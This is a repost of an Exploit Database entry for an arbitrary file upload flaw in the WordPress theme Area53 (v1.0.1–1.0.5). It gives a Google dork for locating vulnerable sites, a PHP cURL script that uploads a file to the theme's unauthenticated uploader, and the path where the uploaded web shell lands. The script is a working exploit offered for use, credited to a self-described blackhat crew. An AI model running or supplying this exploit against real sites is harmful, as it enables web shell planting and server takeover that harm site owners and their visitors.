WordPress Theme Area53 – Arbitrary File Upload

• Exploit Database
• 16 阅读

• 作者： Byakuya Kouta
  日期： 2013-10-19
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/29068/

• ###################################################################################################
  #_________._____________. .__
  #\_ ___ \____ __| _/____\\ ________\_ |__ |__| ____
  #/\\/ /_ \ / __ |/ __ \ / | \_/ __ \ \/ \/ /| __ \||/ __ \ 
  #\ \___(<_> ) /_/ \___//|\___/\ / | \_\ \\___/ 
  # \______/\____/\____ |\___> \____|__/\___>\/\_/|___/__|\___>
  #\/\/\/\/ \/\/\/ 
  ###################################################################################################
  # Exploit Title: WordPress Area53 theme Arbitrary File Upload Vulnerability
  # Author: Byakuya
  # Date: 10/19/2013
  # Vendor Homepage: http://themeforest.net/
  # Themes Link: http://themeforest.net/item/area53-a-responsive-html5-wordpress-theme/2538737
  # Affected Version: v1.0.1 - v1.0.5
  # Price: $50
  # Category: webapps/php
  # Google dork: inurl:wp-content/themes/area53/
  ###################################################################################################
  
  # Exploit
  
  <?php
  $uploadfile = "up.php";
  $ch = curl_init(“http://site.com/wordpress/wp-content/themes/area53/framework/_scripts/valums_uploader/php.php”);
  curl_setopt($ch, CURLOPT_POST, true);
  curl_setopt($ch, CURLOPT_POSTFIELDS,
  array(‘qqfile’=>”@$uploadfile”));
  curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  $postResult = curl_exec($ch);
  curl_close($ch);
  print “$postResult”;
  ?>
  
  #Shell path: http://site.com/wordpress/wp-content/uploads/2013/10/up.php
  
  #Credit: ./Byakuya ./Mr Ohsem ./Cai ./RatKid ./Agam ./Lord-Router ./X-Tuned ./Official Code-Newbie
  #Facebook: https://www.facebook.com/CodeNewbieCrew
  #Website: http://www.codenewbie.net
  #Malaysia & Indonesia BlackHat
  ###################################################################################################